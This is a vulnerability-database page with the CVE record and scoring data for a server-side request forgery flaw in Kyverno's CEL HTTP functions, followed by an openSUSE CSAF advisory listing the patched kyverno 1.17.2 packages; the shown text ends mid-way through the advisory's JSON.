Vulnerability-Lookup

CVE-2026-4789 (GCVE-0-2026-4789)

Vulnerability from cvelistv5 – Published: 2026-03-30 20:44 – Updated: 2026-04-01 18:43

Title

CVE-2026-4789

Summary

Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-918 Server-Side Request Forgery (SSRF)

Assigner

certcc

References

3 references

URL	Tags
https://github.com/kyverno/kyverno
https://kb.cert.org/vuls/id/655822
https://portswigger.net/web-security/ssrf

Impacted products

1 product

Vendor	Product	Version
Kyverno	Kyverno	Affected: 1.16.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2026-03-30T21:18:08.577Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://www.kb.cert.org/vuls/id/655822"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2026-4789",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-01T18:43:09.447511Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-01T18:43:50.952Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kyverno",
          "vendor": "Kyverno",
          "versions": [
            {
              "status": "affected",
              "version": "1.16.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "CWE-918 Server-Side Request Forgery (SSRF)",
              "lang": "en"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-30T20:44:00.607Z",
        "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "shortName": "certcc"
      },
      "references": [
        {
          "url": "https://github.com/kyverno/kyverno"
        },
        {
          "url": "https://kb.cert.org/vuls/id/655822"
        },
        {
          "url": "https://portswigger.net/web-security/ssrf"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "CVE-2026-4789",
      "x_generator": {
        "engine": "VINCE 3.0.35",
        "env": "prod",
        "origin": "https://cveawg.mitre.org/api/cve/CVE-2026-4789"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
    "assignerShortName": "certcc",
    "cveId": "CVE-2026-4789",
    "datePublished": "2026-03-30T20:44:00.607Z",
    "dateReserved": "2026-03-24T20:03:13.388Z",
    "dateUpdated": "2026-04-01T18:43:50.952Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-4789",
      "date": "2026-05-18",
      "epss": "0.00022",
      "percentile": "0.06189"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-4789\",\"sourceIdentifier\":\"cret@cert.org\",\"published\":\"2026-03-30T21:17:10.843\",\"lastModified\":\"2026-04-03T18:17:51.837\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.\"},{\"lang\":\"es\",\"value\":\"Kyverno, versiones 1.16.0 y posteriores, son vulnerables a SSRF debido a funciones HTTP CEL sin restricciones.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.16.0\",\"versionEndIncluding\":\"1.17.1\",\"matchCriteriaId\":\"F2E0715F-61DE-45F5-840E-06CF5C468D33\"}]}]}],\"references\":[{\"url\":\"https://github.com/kyverno/kyverno\",\"source\":\"cret@cert.org\",\"tags\":[\"Product\"]},{\"url\":\"https://kb.cert.org/vuls/id/655822\",\"source\":\"cret@cert.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://portswigger.net/web-security/ssrf\",\"source\":\"cret@cert.org\",\"tags\":[\"Technical Description\"]},{\"url\":\"https://www.kb.cert.org/vuls/id/655822\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://www.kb.cert.org/vuls/id/655822\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2026-03-30T21:18:08.577Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-4789\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-01T18:43:09.447511Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-01T18:43:36.754Z\"}}], \"cna\": {\"title\": \"CVE-2026-4789\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"affected\": [{\"vendor\": \"Kyverno\", \"product\": \"Kyverno\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.16.0\"}]}], \"references\": [{\"url\": \"https://github.com/kyverno/kyverno\"}, {\"url\": \"https://kb.cert.org/vuls/id/655822\"}, {\"url\": \"https://portswigger.net/web-security/ssrf\"}], \"x_generator\": {\"env\": \"prod\", \"engine\": \"VINCE 3.0.35\", \"origin\": \"https://cveawg.mitre.org/api/cve/CVE-2026-4789\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"description\": \"CWE-918 Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"37e5125f-f79b-445b-8fad-9564f167944b\", \"shortName\": \"certcc\", \"dateUpdated\": \"2026-03-30T20:44:00.607Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-4789\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-01T18:43:50.952Z\", \"dateReserved\": \"2026-03-24T20:03:13.388Z\", \"assignerOrgId\": \"37e5125f-f79b-445b-8fad-9564f167944b\", \"datePublished\": \"2026-03-30T20:44:00.607Z\", \"assignerShortName\": \"certcc\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

OPENSUSE-SU-2026:10613-1

Vulnerability from csaf_opensuse - Published: 2026-04-25 00:00 - Updated: 2026-04-25 00:00

Summary

kyverno-1.17.2-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: kyverno-1.17.2-1.1 on GA media

Description of the patch: These are all security issues fixed in the kyverno-1.17.2-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-10613

CVE-2026-1229

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64	—	Vendor Fix

Threats

Impact critical

CVE-2026-24051

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64	—	Vendor Fix

Threats

Impact important

CVE-2026-33186

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64	—	Vendor Fix

Threats

Impact important

CVE-2026-34986

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64	—	Vendor Fix

Threats

Impact important

CVE-2026-4789

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64	—	Vendor Fix

Threats

Impact critical

References

15 references

URL	Category
https://www.suse.com/support/security/rating/	external
https://ftp.suse.com/pub/projects/security/csaf/o…	self
https://www.suse.com/security/cve/CVE-2026-1229/	self
https://www.suse.com/security/cve/CVE-2026-24051/	self
https://www.suse.com/security/cve/CVE-2026-33186/	self
https://www.suse.com/security/cve/CVE-2026-34986/	self
https://www.suse.com/security/cve/CVE-2026-4789/	self
https://www.suse.com/security/cve/CVE-2026-1229	external
https://www.suse.com/security/cve/CVE-2026-24051	external
https://bugzilla.suse.com/1259133	external
https://www.suse.com/security/cve/CVE-2026-33186	external
https://bugzilla.suse.com/1260085	external
https://www.suse.com/security/cve/CVE-2026-34986	external
https://www.suse.com/security/cve/CVE-2026-4789	external
https://bugzilla.suse.com/1261190	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "kyverno-1.17.2-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the kyverno-1.17.2-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-10613",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10613-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-1229 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-1229/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-24051 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-24051/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-33186 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-33186/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-34986 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-34986/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-4789 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-4789/"
      }
    ],
    "title": "kyverno-1.17.2-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-04-25T00:00:00Z",
      "generator": {
        "date": "2026-04-25T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:10613-1",
      "initial_release_date": "2026-04-25T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-04-25T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "kyverno-1.17.2-1.1.aarch64",
                "product": {
                  "name": "kyverno-1.17.2-1.1.aarch64",
                  "product_id": "kyverno-1.17.2-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-bash-completion-1.17.2-1.1.aarch64",
                "product": {
                  "name": "kyverno-bash-completion-1.17.2-1.1.aarch64",
                  "product_id": "kyverno-bash-completion-1.17.2-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-fish-completion-1.17.2-1.1.aarch64",
                "product": {
                  "name": "kyverno-fish-completion-1.17.2-1.1.aarch64",
                  "product_id": "kyverno-fish-completion-1.17.2-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-zsh-completion-1.17.2-1.1.aarch64",
                "product": {
                  "name": "kyverno-zsh-completion-1.17.2-1.1.aarch64",
                  "product_id": "kyverno-zsh-completion-1.17.2-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "kyverno-1.17.2-1.1.ppc64le",
                "product": {
                  "name": "kyverno-1.17.2-1.1.ppc64le",
                  "product_id": "kyverno-1.17.2-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-bash-completion-1.17.2-1.1.ppc64le",
                "product": {
                  "name": "kyverno-bash-completion-1.17.2-1.1.ppc64le",
                  "product_id": "kyverno-bash-completion-1.17.2-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-fish-completion-1.17.2-1.1.ppc64le",
                "product": {
                  "name": "kyverno-fish-completion-1.17.2-1.1.ppc64le",
                  "product_id": "kyverno-fish-completion-1.17.2-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-zsh-completion-1.17.2-1.1.ppc64le",
                "product": {
                  "name": "kyverno-zsh-completion-1.17.2-1.1.ppc64le",
                  "product_id": "kyverno-zsh-completion-1.17.2-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "kyverno-1.17.2-1.1.s390x",
                "product": {
                  "name": "kyverno-1.17.2-1.1.s390x",
                  "product_id": "kyverno-1.17.2-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-bash-completion-1.17.2-1.1.s390x",
                "product": {
                  "name": "kyverno-bash-completion-1.17.2-1.1.s390x",
                  "product_id": "kyverno-bash-completion-1.17.2-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-fish-completion-1.17.2-1.1.s390x",
                "product": {
                  "name": "kyverno-fish-completion-1.17.2-1.1.s390x",
                  "product_id": "kyverno-fish-completion-1.17.2-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-zsh-completion-1.17.2-1.1.s390x",
                "product": {
                  "name": "kyverno-zsh-completion-1.17.2-1.1.s390x",
                  "product_id": "kyverno-zsh-completion-1.17.2-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "kyverno-1.17.2-1.1.x86_64",
                "product": {
                  "name": "kyverno-1.17.2-1.1.x86_64",
                  "product_id": "kyverno-1.17.2-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-bash-completion-1.17.2-1.1.x86_64",
                "product": {
                  "name": "kyverno-bash-completion-1.17.2-1.1.x86_64",
                  "product_id": "kyverno-bash-completion-1.17.2-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-fish-completion-1.17.2-1.1.x86_64",
                "product": {
                  "name": "kyverno-fish-completion-1.17.2-1.1.x86_64",
                  "product_id": "kyverno-fish-completion-1.17.2-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kyverno-zsh-completion-1.17.2-1.1.x86_64",
                "product": {
                  "name": "kyverno-zsh-completion-1.17.2-1.1.x86_64",
                  "product_id": "kyverno-zsh-completion-1.17.2-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-1.17.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64"
        },
        "product_reference": "kyverno-1.17.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-1.17.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le"
        },
        "product_reference": "kyverno-1.17.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-1.17.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x"
        },
        "product_reference": "kyverno-1.17.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-1.17.2-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64"
        },
        "product_reference": "kyverno-1.17.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-bash-completion-1.17.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64"
        },
        "product_reference": "kyverno-bash-completion-1.17.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-bash-completion-1.17.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le"
        },
        "product_reference": "kyverno-bash-completion-1.17.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-bash-completion-1.17.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x"
        },
        "product_reference": "kyverno-bash-completion-1.17.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-bash-completion-1.17.2-1.1.x86_64 as component of openSUSE Tumbleweed",
